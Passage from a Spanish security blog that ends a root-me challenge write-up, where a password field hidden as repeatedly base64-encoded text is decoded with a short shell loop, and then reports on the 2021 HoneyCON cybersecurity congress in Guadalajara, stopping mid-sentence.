comas a columnas aplicamos filtros.</p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgl9oveplTBFXpR6meVBCqR1zDT-A2VDWyn_NQoMAwXKC09gPEPLNJX1tUW6GXr9KZ9hEKNuyOcDu5eh7SABVZSs-nQXyWOO9HijW94Y7QADjL2MROL4ZuSBWd0Hm6mjVA16s8eMbrJ868-eagCuD5gt0YLE0bhq43COe3v-H20JyR4b_klpQZvQAwLjQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="668" data-original-width="886" height="483" src="https://blogger.googleusercontent.com/img/a/AVvXsEgl9oveplTBFXpR6meVBCqR1zDT-A2VDWyn_NQoMAwXKC09gPEPLNJX1tUW6GXr9KZ9hEKNuyOcDu5eh7SABVZSs-nQXyWOO9HijW94Y7QADjL2MROL4ZuSBWd0Hm6mjVA16s8eMbrJ868-eagCuD5gt0YLE0bhq43COe3v-H20JyR4b_klpQZvQAwLjQ=w640-h483" width="640" /></a></div><br /><br /><p></p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;"><v:shape id="Imagen_x0020_26" o:spid="_x0000_i1034" style="height: 321pt; mso-wrap-style: square; visibility: visible; width: 425.25pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image023.png">
</v:imagedata></v:shape></span><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;">Y filtramos por cada uno de los
campos comprobando si hay alguna incongruencia y curiosamente en el campo de
las contraseñas existe un registro que es mucho más grande que los demás.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;"><v:shape id="Imagen_x0020_27" o:spid="_x0000_i1033" style="height: 250.5pt; mso-wrap-style: square; visibility: visible; width: 230.25pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image024.png">
</v:imagedata></v:shape></span><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p> </o:p></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiWFJigsb0Upd-TKWivKdB9DNwTP-LdZdSrn4v7NhhSEuwCfLeY4KlBxk657Lm9ZzlSNFm4_RUSlOXePyACiD7mgCw1kd1eyiNJWo4odvpWBusxMMRaCTNPKAGHaZNF39Vi8Gvqb_ZoaPZCCyGdqbY3gNqZeCTSFtRg0thFwid_UJ9JRZYk8ripOftrbg" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="522" data-original-width="480" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEiWFJigsb0Upd-TKWivKdB9DNwTP-LdZdSrn4v7NhhSEuwCfLeY4KlBxk657Lm9ZzlSNFm4_RUSlOXePyACiD7mgCw1kd1eyiNJWo4odvpWBusxMMRaCTNPKAGHaZNF39Vi8Gvqb_ZoaPZCCyGdqbY3gNqZeCTSFtRg0thFwid_UJ9JRZYk8ripOftrbg=w589-h640" width="589" /></a></div><br /><p></p>
<p class="MsoNormal" style="text-align: justify;">Mirándolo muy de cerca se puede
observar que acaba en “=” lo que hace suponer que pueda tratarse de un string
encodeado en base64.<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjLgcM24S5fPTWvcb4mnyUTA_4GadxOmUnAsLFOWUf9aq7-WTjIFzXQgUJtkU9nBveWBs8FGRD_GZgZzcqk2vFCrGSxZn1H18d9rhUpKtVlUI4fF_h2KrHasagoPJAjJDLblpu3mb4RibNbUcXaAfW978yd3AS4XnSLR-iadxDYriEKHO48NAKE7UMKsg" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="358" data-original-width="886" height="258" src="https://blogger.googleusercontent.com/img/a/AVvXsEjLgcM24S5fPTWvcb4mnyUTA_4GadxOmUnAsLFOWUf9aq7-WTjIFzXQgUJtkU9nBveWBs8FGRD_GZgZzcqk2vFCrGSxZn1H18d9rhUpKtVlUI4fF_h2KrHasagoPJAjJDLblpu3mb4RibNbUcXaAfW978yd3AS4XnSLR-iadxDYriEKHO48NAKE7UMKsg=w640-h258" width="640" /></a></div><br />Lo intentamos decodear en caine
con el comando <span style="font-family: Wingdings;">à</span>
echo “string” | base64 --decode y nos un nuevo string en base64.<p></p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Como es una locura decodear esto
de forma manual, se me ocurrió crear un pequeño script en Shellscript que
tomase como referencia un archivo en el que escribo el base64 original y vaya
decodeando un número limitado de veces.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Para ello creamos un archivo
llamado base64code0<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh7aNtTbHU6JaUJPLcNWroI3heW1BYhC32CpexxFyVsAChTCm9CunMtqpOzTVlk9sfV3syMvKn3eiUeYE90qWtrq66Dr26xn-wuPyB2VefBo_ryzcG26RvUM4sz_zbydmhcvzm4R0Mm-dhHp23ducZxXDbK9wV5pU4n_iT2ZqhpvlTvQS1Kd20Hs2mWvw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="50" data-original-width="836" height="38" src="https://blogger.googleusercontent.com/img/a/AVvXsEh7aNtTbHU6JaUJPLcNWroI3heW1BYhC32CpexxFyVsAChTCm9CunMtqpOzTVlk9sfV3syMvKn3eiUeYE90qWtrq66Dr26xn-wuPyB2VefBo_ryzcG26RvUM4sz_zbydmhcvzm4R0Mm-dhHp23ducZxXDbK9wV5pU4n_iT2ZqhpvlTvQS1Kd20Hs2mWvw=w640-h38" width="640" /></a></div><br />Pegamos el string<p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiQ6j6GweVyUfcKNObeIFRUV5lGgFR8-nr51WdGrA-n9ocEVNRfmD-eCei7i_SYCilO8cilGo1M1hqTUPc4zM6C_qBgFPFrt4YYFBTdMyozYvhO9uCSfmQfKD6tsj2bOEOyQf9qw90esqNzFVj7_tvos01mp4-kLu1-57VJDuX-8JFGgKzNsbOrwbhZZw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="52" data-original-width="886" height="38" src="https://blogger.googleusercontent.com/img/a/AVvXsEiQ6j6GweVyUfcKNObeIFRUV5lGgFR8-nr51WdGrA-n9ocEVNRfmD-eCei7i_SYCilO8cilGo1M1hqTUPc4zM6C_qBgFPFrt4YYFBTdMyozYvhO9uCSfmQfKD6tsj2bOEOyQf9qw90esqNzFVj7_tvos01mp4-kLu1-57VJDuX-8JFGgKzNsbOrwbhZZw=w640-h38" width="640" /></a></div><br />Creamos un fichero script llamado
scriptdecode.sh que realice la operación de decodear el string, mandarlo a un
archivo vacío y retomarlo, en este caso durante unas 30 veces.<p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEipKFL1tZv_1sChuGMptexC5hEtgQDlV_SMAlV4fDkzuaKjU6-boFzZhUM-GrdGpIZvm5uhqynPIRc8t0XhxOHOP7q7QjOV6iR7uRgoiC4vDXky7YAp5kdBP4N83JjBMYG2ti4cN4w5qZgjmdz2dMBpm3qS6mqE9Kpo3JOZbywpUIwoEw9g0lCDDmYh9g" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="236" data-original-width="886" height="170" src="https://blogger.googleusercontent.com/img/a/AVvXsEipKFL1tZv_1sChuGMptexC5hEtgQDlV_SMAlV4fDkzuaKjU6-boFzZhUM-GrdGpIZvm5uhqynPIRc8t0XhxOHOP7q7QjOV6iR7uRgoiC4vDXky7YAp5kdBP4N83JjBMYG2ti4cN4w5qZgjmdz2dMBpm3qS6mqE9Kpo3JOZbywpUIwoEw9g0lCDDmYh9g=w640-h170" width="640" /></a></div><br />Otorgamos permisos de ejecución<p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjwjmx9gsNP4QOjNWlJTQSf1BXUCmcutIZkfCiAGfG48YPku29ZPv8C_182nR5LvYMOTIaZpCeYWdNYmv2la4AY1qsReVDbWy-g2mG0e20uIB6jzkRH9KhQH91mid_LFfHmk2DH96KwEJBYGKgxWVH64zhTH8LosRRuUDtcOZVqO_fBYZTL0yOHxcee_Q" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="48" data-original-width="886" height="34" src="https://blogger.googleusercontent.com/img/a/AVvXsEjwjmx9gsNP4QOjNWlJTQSf1BXUCmcutIZkfCiAGfG48YPku29ZPv8C_182nR5LvYMOTIaZpCeYWdNYmv2la4AY1qsReVDbWy-g2mG0e20uIB6jzkRH9KhQH91mid_LFfHmk2DH96KwEJBYGKgxWVH64zhTH8LosRRuUDtcOZVqO_fBYZTL0yOHxcee_Q=w640-h34" width="640" /></a></div><br /><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;">Lo ejecutamos.<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEji-EEx5UGYUbI-TagKKSdIyk02kwi9eYqodmyqmbxXwAl76iP9zsti-XFWflrV_uUi5rrOeZg7rLgWDXzlAmSypY-eVx4rx_6gJGRb_-8iKB8oLgVHo5SMB388lRmNaEpWIEduwZtH2dKxOeW_gDpbXNtujysRZ5A7YkpH1e4lcS1k1v5HMvikE6oPkw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="106" data-original-width="886" height="76" src="https://blogger.googleusercontent.com/img/a/AVvXsEji-EEx5UGYUbI-TagKKSdIyk02kwi9eYqodmyqmbxXwAl76iP9zsti-XFWflrV_uUi5rrOeZg7rLgWDXzlAmSypY-eVx4rx_6gJGRb_-8iKB8oLgVHo5SMB388lRmNaEpWIEduwZtH2dKxOeW_gDpbXNtujysRZ5A7YkpH1e4lcS1k1v5HMvikE6oPkw=w640-h76" width="640" /></a></div><br /><p></p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;"><v:shape id="Imagen_x0020_33" o:spid="_x0000_i1027" style="height: 51pt; mso-wrap-style: square; visibility: visible; width: 425.25pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image030.png">
</v:imagedata></v:shape></span><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;">Al finalizar la ejecución vamos a
obtener unos 30 archivos como resultado, por lo que nos tocará revisarlos uno
por uno.<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjn0hzgirZfCGDkNava9wIuO_waW5Yec7idg-MxWF-ukwAy7tIINiG5tzyu5Km3PwLCK4w19InfQ2cGB41mUQ0r8zw184oxXRW8bLe1W_JaZbM8V_ZuhYoOnx0nKDvkFWJ-4CilZvPKElmGJU507JN58bySf0U-TDoZrAA2ixJx9rIB-9sJAmZ9E9Hfig" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="629" data-original-width="886" height="454" src="https://blogger.googleusercontent.com/img/a/AVvXsEjn0hzgirZfCGDkNava9wIuO_waW5Yec7idg-MxWF-ukwAy7tIINiG5tzyu5Km3PwLCK4w19InfQ2cGB41mUQ0r8zw184oxXRW8bLe1W_JaZbM8V_ZuhYoOnx0nKDvkFWJ-4CilZvPKElmGJU507JN58bySf0U-TDoZrAA2ixJx9rIB-9sJAmZ9E9Hfig=w640-h454" width="640" /></a></div><br />En mi caso, accedemos al número
21 y ahí se encontrará la contraseña que necesitamos introducir en root-me para
obtener los 50 puntos del reto.<p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEglH4UBHU8rAPfg1JgVpL5hjlIDQOn2ofNz7HywUoHMN4BNFz2zfclQ8TJajK2gHP0TOiQXRyuI6acAzxwg633STU9iNEnVog0EVUpvfBQLDN-MTjsJJrBpX0PfFCCeTg9gwWVVfaPPyqsNq5WiKN4v_uuS3OiAhNpAy7pqgnn8CezyU8Nkc-0awPSC-g" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="438" data-original-width="886" height="316" src="https://blogger.googleusercontent.com/img/a/AVvXsEglH4UBHU8rAPfg1JgVpL5hjlIDQOn2ofNz7HywUoHMN4BNFz2zfclQ8TJajK2gHP0TOiQXRyuI6acAzxwg633STU9iNEnVog0EVUpvfBQLDN-MTjsJJrBpX0PfFCCeTg9gwWVVfaPPyqsNq5WiKN4v_uuS3OiAhNpAy7pqgnn8CezyU8Nkc-0awPSC-g=w640-h316" width="640" /></a></div><br /><br /><p></p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;"><v:shape id="Imagen_x0020_35" o:spid="_x0000_i1025" style="height: 210pt; mso-wrap-style: square; visibility: visible; width: 425.25pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image032.png">
</v:imagedata></v:shape></span><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;">Espero que os haya gustado.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Un saludo.<o:p></o:p></p><br /></span><p></p></div></div></div>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com019222 Tamajón, Guadalajara, España41.0005282 -3.24812212.690294363821153 -38.404372 69.310762036178843 31.908128tag:blogger.com,1999:blog-4789894782637921835.post-56543082602027029422021-11-14T20:47:00.004+01:002021-11-15T14:16:48.827+01:00HoneyCON 21, una edición Hibrida para volver a la normalidad<p> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_FHLBdZGoWedsaoyM_xpd7psvWNHl-3NbqTbIWsfqaDMmVyn7UrMLxFEayn1TeCCHmPc8uPVwY9ywjUYHf4QDMYFxmktaPQnDFV7wXQMjKDFP0xLshb0LSeOgxf4khp3hGzZeSXyRgagy/s1772/_SVE0041_150.jpg" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="1183" data-original-width="1772" height="429" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_FHLBdZGoWedsaoyM_xpd7psvWNHl-3NbqTbIWsfqaDMmVyn7UrMLxFEayn1TeCCHmPc8uPVwY9ywjUYHf4QDMYFxmktaPQnDFV7wXQMjKDFP0xLshb0LSeOgxf4khp3hGzZeSXyRgagy/w640-h429/_SVE0041_150.jpg" width="640" /></a></p><br /><p></p><p></p><p class="MsoNormal" style="text-align: justify;"><b><i>Por séptimo año consecutivo
se celebro el Congreso de seguridad Informática ciudad de Guadalajara, una edición
marcada por la vuelta a los eventos presenciales tras la pandemia y que se
celebro de manera hibrida entre lo presencial y lo online retransmitiéndose en
Twitch casi 20 horas de contenidos, El congreso fue seguido desde 49 países según
rezan las estadísticas de los distintos portales utilizados y afianza su
presencia internacional por segundo año consecutivo.</i></b></p><p class="MsoNormal" style="text-align: justify;"><b><span></span></b></p><a name='more'></a><p></p><div style="text-align: justify;">El pasado sábado 13 se clausuro el séptimo “Congreso de Seguridad Informática Ciudad de Guadalajara” conocido popularmente como HoneyCon. A lo largo de una semana se han realizado diferentes talleres y ponencias relacionadas con la Ciberseguridad a todos los niveles, desde el más próximo y personal, hasta el más técnico y profesionalizado.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Durante los primeros días se realizaron charlas y ponencias relacionadas con la influencia que tiene la tecnología en los menores y como las familias tienen que actuar ante los distintos peligros que el acceso a la tecnología provoca. Los eventos se abrieron con la charla “menores, familias y Redes Sociales” con la colaboración de la Mancomunidad THAM y dirigida a padres y madres. Las ponencias fueron completadas a lo largo de la semana con las charlas de “Los peligros de internet” de la mano de Pedro Gonzalez, “Fake news y adolescencia” por Miriam Martinez y “Escape Room ¿Ciberbullying, sexting?” donde Carlos Lagaron de la asociación Infoacoso.es nos enumero los riesgos del uso desmedido e incontrolado de redes sociales e internet.</div><div style="text-align: justify;"><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy2t2njx2sKQBsHVjdes10fzgPdym16hvEB57Hed3z5Q4Q-bbmZeGSRHAw5hGe-A0o2QQGkWPZ0swLjVqOIvbvF78ub54zKJJwHmRlTZDLdxlXgO0sNYy1GhDFBweQzrF239Vi-1pmddzw/s1580/Charla+THAM+2.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="810" data-original-width="1580" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy2t2njx2sKQBsHVjdes10fzgPdym16hvEB57Hed3z5Q4Q-bbmZeGSRHAw5hGe-A0o2QQGkWPZ0swLjVqOIvbvF78ub54zKJJwHmRlTZDLdxlXgO0sNYy1GhDFBweQzrF239Vi-1pmddzw/w640-h328/Charla+THAM+2.JPG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;">Figura: Charla con Familias de la Mancomunidad THAM</div><br /><div style="text-align: justify;">En la jornada de jueves, arrancaron los eventos presenciales con el tradicional Hack and Beers, iniciativa a nivel nacional, que volvía en Guadalajara tras varios meses de parón por la Pandemia.</div><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"><b>Presentación institucional<o:p></o:p></b></p><p class="MsoNormal" style="text-align: justify;">El viernes el congreso se
traslado al Salón de actos del Centro Asociado de la UNED en Guadalajara, donde
se realizó la inauguración institucional de la mano de Félix Hernandez
representando a UNED, Israel Marco como Concejal de Transformación Digital y Nuevas
Tecnologías del Ayuntamiento de Guadalajara y Pilar Cuevas que de manera
presencial represento a la Junta de Comunidades de Castilla La Mancha que tras
su alocución dio paso a Juan Ángel Morejudo, Director General de Administración
Digital de la JCCM, que en un video de 7 minutos presento las inversiones en
materia de ciberseguridad que tiene planeado acometer la Junta en los próximos meses,
destacando la puesta en marcha de un centro de ciberseguridad en el Centro
Regional de Innovación y la implantación de un Plan Director de Seguridad de la
Información con el objetivo de proteger las infraestructuras y de manera
finalista a los servicios que los ciudadanos de Castilla La Mancha consumen, así
como, su información.<o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoj7I_KJ3sZVoK-xUnRRjjr7UeqADIVrH-l7TIPrXwFVSeqHU5UIQt0Jh1IYjzMcvkMwqJfd4wg_UYaI5Xd7zqGTCkdBcIyqMtaId0TnoLQQ3jUXe1krWH1Y27p3v7KzjmfSXjn5Yg7egv/s1833/_SVE0023_150.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1181" data-original-width="1833" height="412" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoj7I_KJ3sZVoK-xUnRRjjr7UeqADIVrH-l7TIPrXwFVSeqHU5UIQt0Jh1IYjzMcvkMwqJfd4wg_UYaI5Xd7zqGTCkdBcIyqMtaId0TnoLQQ3jUXe1krWH1Y27p3v7KzjmfSXjn5Yg7egv/w640-h412/_SVE0023_150.jpg" width="640" /></a></div><div style="text-align: center;">Figura: Mesa inaugural del VII Congreso HoneyCON</div><p class="MsoNormal" style="text-align: justify;"><br /></p><p class="MsoNormal" style="text-align: justify;"><b>Charlas técnicas presenciales<o:p></o:p></b></p><p class="MsoNormal" style="text-align: justify;">Tras la presentación, se dio paso
a las charlas de carácter técnico, un contenido tradicional en el congreso y
que en esta séptima edición fueron iniciadas por el Instituto Nacional de Ciberseguridad
presentando su Academia para Hackers, de la que sale la representación que
todos los años compite a nivel internacional y que en los últimos años tan buenos
resultados han cosechado con varios primeros puestos. Continuo Guillermo Roman
con una charla sobre Riesgos sobre email corporativo (Business Email Compromise
- Tendencias y moda 2021). Previo al descanso Vicente Aguilera nos
introdujo en el mundo de la Ciberinteligencia con su ponencia “Escalar
capacidades en Ciberseguridad mediante la Ciberinteligencia” que no dejo
indiferente a nadie.<o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE8qx-xdAOVf3ukIGmLPKO1U0Q_UlBox0j5s1TpgKrmVPgFCW4kmr2xDzw1yuIxdUrsuRkVaxOxcf2j8579UA5045dfBBj901T7_0NbljSZqNfll-8VQFavePG0q2CnI2iib01u0JUVkw5/s1772/_SVE0061_150.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1183" data-original-width="1772" height="428" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE8qx-xdAOVf3ukIGmLPKO1U0Q_UlBox0j5s1TpgKrmVPgFCW4kmr2xDzw1yuIxdUrsuRkVaxOxcf2j8579UA5045dfBBj901T7_0NbljSZqNfll-8VQFavePG0q2CnI2iib01u0JUVkw5/w640-h428/_SVE0061_150.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;">Figura: Guillermo Román en su charla sobre riesgos en Email</div><br /><br /><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><p></p><p class="MsoNormal" style="text-align: justify;">Una vez repuestas las fuerzas con
un breve descanso se prosiguió con dos nuevas charlas, la primera de la mano de
Joaquín Molina, Experto en Ciberseguridad con gran reputación en el panorama nacional,
que nos presento su charla “Entornos nublosos: Cazando malosos con procesos
asombrosos. Threat Hunting”, que dio paso a la ultima ponencia de la
tarde del viernes “Memorias de un DFIer vol VIII” de la mano de Lorenzo
Martinez, conocido forense y experto en ciberseguridad, que explico coloquialmente
tres de sus últimos casos, haciendo las delicias del público allí presente.
Tras el cierre se procedió a la tradicional cena de ponentes y organizadores
que este año se realizo en el Casino de la Calle Mayor.<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLU2y3VFy7IMmr_Rr5mBIRZjK8NvKFL95TUslBnLUEi__Cqe7ggzImshPDV789PAhwIDMiUYDcx521ZZKLf2B-TOynSPPek3zRq-AFnusa5DTdOgeJgzfskHoIf7fV0Szt1b5vy6CRmlzX/s1772/_SVE0139_150.jpg" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="1182" data-original-width="1772" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLU2y3VFy7IMmr_Rr5mBIRZjK8NvKFL95TUslBnLUEi__Cqe7ggzImshPDV789PAhwIDMiUYDcx521ZZKLf2B-TOynSPPek3zRq-AFnusa5DTdOgeJgzfskHoIf7fV0Szt1b5vy6CRmlzX/w640-h426/_SVE0139_150.jpg" width="640" /></a></p><p class="MsoNormal" style="text-align: center;">Figura: Joaquín Molina en su ponencia</p><p class="MsoNormal" style="text-align: justify;"><b>Talleres técnicos<o:p></o:p></b></p><p class="MsoNormal" style="text-align: justify;">Durante la jornada del sábado la
actividad presencial prosiguió en el Centro Asociado de la UNED, ofreciéndose cinco
talleres con temas variados y que estaban pensados para cubrir todos los
niveles, desde personas sin conocimientos y experiencia que aprenderían a
realizar investigaciones de lo expuestos que están en Internet hasta talleres
de Pentesting, Hardering, Post-explotación e investigaciones OSINT mediante Raspberry
PI. Todo un menú variado para que cualquiera que se acercase pudiera encontrar
un hueco donde sentirse cómodo y aprender de tan importantes ponentes.<o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4mAyv4FvC4y2p3iDhZR_35mDUyvrVXEWhx4b2Zu9wnRxBKujY4qPyuZ3mhMnl_7eMNeEa1Iq_zyvmo83HuirHa2_Soiru0rk-GyRpymYeB0wzsnaoghkGzpH2lPVBmsTiM_AKb6IUCTBZ/s800/dd2d7503-c48e-4309-b815-9b663871f5c6.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="600" data-original-width="800" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4mAyv4FvC4y2p3iDhZR_35mDUyvrVXEWhx4b2Zu9wnRxBKujY4qPyuZ3mhMnl_7eMNeEa1Iq_zyvmo83HuirHa2_Soiru0rk-GyRpymYeB0wzsnaoghkGzpH2lPVBmsTiM_AKb6IUCTBZ/w640-h480/dd2d7503-c48e-4309-b815-9b663871f5c6.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;">Figura: Uno de los talleres de la Jornada de Sábado</div><p class="MsoNormal" style="text-align: justify;"><b>Ponencias Online
internacionales</b></p><p class="MsoNormal" style="text-align: justify;">También durante la jornada de sábado,
se inicio una de las partes online de este congreso, que tras el éxito del
maratón 24 horas de la edición anterior ha venido para quedarse. En esta séptima
edición se desplegaron dos canales, uno en Castellano con ponentes de diferentes
localizaciones como España, Colombia, Guatemala y Chile, afianzando los lazos
que el congreso tiene en latino América. Las temáticas fueron eminentemente técnicas
y muy variadas, como muestra la charla de Jairo Fariña, que nos hablo de “Pentesting
en Inteligencia Artificial: Ataques adversarios de caja negra a una red de
clasificación de señales de tráfico” acercándonos un poco a los posibles
problemas que pueden plantearse en el futuro mediante el uso de redes
neuronales para interpretar la realidad y como se pueden engañar. Otros ejemplos
fueron las charlas de Josep Albors y Felipe Duarte, hablándonos de malware
avanzado y por el lado de la Gestion de las vulnerabilidades de empresas e instituciones
se presentaron dos ponencias de la mano de Mario Rodriguez y Patricio Campos.<o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMp9q6KCwCb36x10ar-nLJg_7Mwo4y8N665uosdRvqMlQtERIOYoRSETfqju0RXk61M5AxXvY1preWktUcFOLGAajPZk2PMJtRfQDCGuWeHmePslPqwYqo5j2ycSSQs5UE6fx9vkC6Ylog/s515/FEGVAqEXIAgGnNY.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="292" data-original-width="515" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMp9q6KCwCb36x10ar-nLJg_7Mwo4y8N665uosdRvqMlQtERIOYoRSETfqju0RXk61M5AxXvY1preWktUcFOLGAajPZk2PMJtRfQDCGuWeHmePslPqwYqo5j2ycSSQs5UE6fx9vkC6Ylog/w640-h362/FEGVAqEXIAgGnNY.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;">Figura: Yolanda Corral con Felipe Duarte en una de las charlas online</div><br /><p class="MsoNormal" style="text-align: justify;">El segundo de los canales, en
idioma inglés, reunió ponentes de Estados Unidos, India, Noruega, Holanda y
Nigeria. Como no podía ser de otra forma, las charlas también fueron variadas y
se habló de programación python y seguridad de la mano de Gajendra Deshpande (India),
Ransomware explicado por Erik Heskes (The Netherlands), Amenazas biológicas,
con Biohacker de Len Noe (USA). El track en ingles lo cerraron el Doctor Joe
Perez (USA) hablándonos de gestión de desastres y Opemipo Disu (Nigeria) que
repaso el futuro de la seguridad informática mediante el uso de Inteligencia
Artificial.</p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglK10aYcL_-9HOiyjazW172xDyk08dZicyjKd0T6KBQUdRcYNcbVGKTJfRZ9dCYkkEsjK8nydm7IhvXuhEDDDg6D9gYzhzlRVHSxS0hRwcH2Wp_nSXcb_meBK-zo4uxAd4tXyq9jQxOd1L/s515/FEGVeJ5XwAcu-vP.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="291" data-original-width="515" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglK10aYcL_-9HOiyjazW172xDyk08dZicyjKd0T6KBQUdRcYNcbVGKTJfRZ9dCYkkEsjK8nydm7IhvXuhEDDDg6D9gYzhzlRVHSxS0hRwcH2Wp_nSXcb_meBK-zo4uxAd4tXyq9jQxOd1L/w640-h362/FEGVeJ5XwAcu-vP.png" width="640" /></a></p><p class="MsoNormal" style="text-align: center;">Figura: Jose Luis Navarro con Opemipo Disu hablando sobre Seguridad e IA</p><p class="MsoNormal" style="text-align: justify;"><b>Impacto del congreso<o:p></o:p></b></p><p class="MsoNormal" style="text-align: justify;">A lo largo de la semana del
congreso los medios que han sido dispuestos para el seguimiento del mismo han
recibido visitas desde diferentes países como España, USA, Alemania, Chile, México,
Colombia, Austria, Bolivia, Finlandia y Holanda mayoritariamente, generando mas
de 150 mil impresiones de los contenidos presentados para una totalidad de 1705
usuarios.<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;">Las retransmisiones online fueron
seguidas por 673 usuarios únicos en el canal de charlas en Castellano y 374
personas en el canal Ingles, generando más de 11 horas de contenidos en
